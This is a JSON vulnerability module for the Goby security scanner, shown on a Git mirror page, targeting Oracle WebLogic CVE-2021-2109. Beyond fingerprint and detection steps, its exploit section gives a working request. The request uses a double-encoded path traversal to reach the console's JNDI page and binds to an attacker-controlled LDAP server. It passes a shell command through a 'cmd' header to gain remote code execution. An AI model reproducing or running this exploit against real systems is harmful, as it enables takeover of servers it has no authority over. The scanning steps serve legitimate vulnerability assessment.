qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Oracle_Weblogic_LDAP_RCE_CV...

106 lines
4.8 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Oracle Weblogic LDAP RCE CVE-2021-2109",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "app=\"Oracle-WeblogicPortal\" || app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
"Description": "Oracle WebLogic Server is the industry leading application server for building enterprise applications using Java EE standards, and deploying them on a reliable, scalable runtime with low cost of ownership. It is strategically integrated with Oracles full product and cloud service portfolio. Oracle WebLogic Server provides compatibility with prior versions, and supports new features for developer productivity, high availability, manageability and deployment to cloud native Kubernetes-based environments.",
"Product": "Oracle Weblogic",
"Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html",
"Author": "",
"Impact": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).",
"Recommendation": "",
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-2109"
],
"HasExp": true,
"ExpParams": [
{
"Name": "Cmd",
"Type": "input",
"Value": "whoami"
},
{
"Name": "Ldap",
"Type": "input",
"Value": "ldap://xxx.xxx.xxx;xxx:1389"
},
{
"Name": "Cookie",
"Type": "input",
"Value": "ADMINCONSOLESESSION=xxxxx"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "JNDI",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)",
"follow_redirect": true,
"header": {
"cmd": "{{{Cmd}}}",
"Cookie": "{{{Cookie}}}"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
Reference in New Issue View Git Blame Copy Permalink